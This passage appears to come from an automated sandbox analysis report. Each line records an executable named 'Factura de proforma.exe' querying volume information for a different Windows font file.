            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
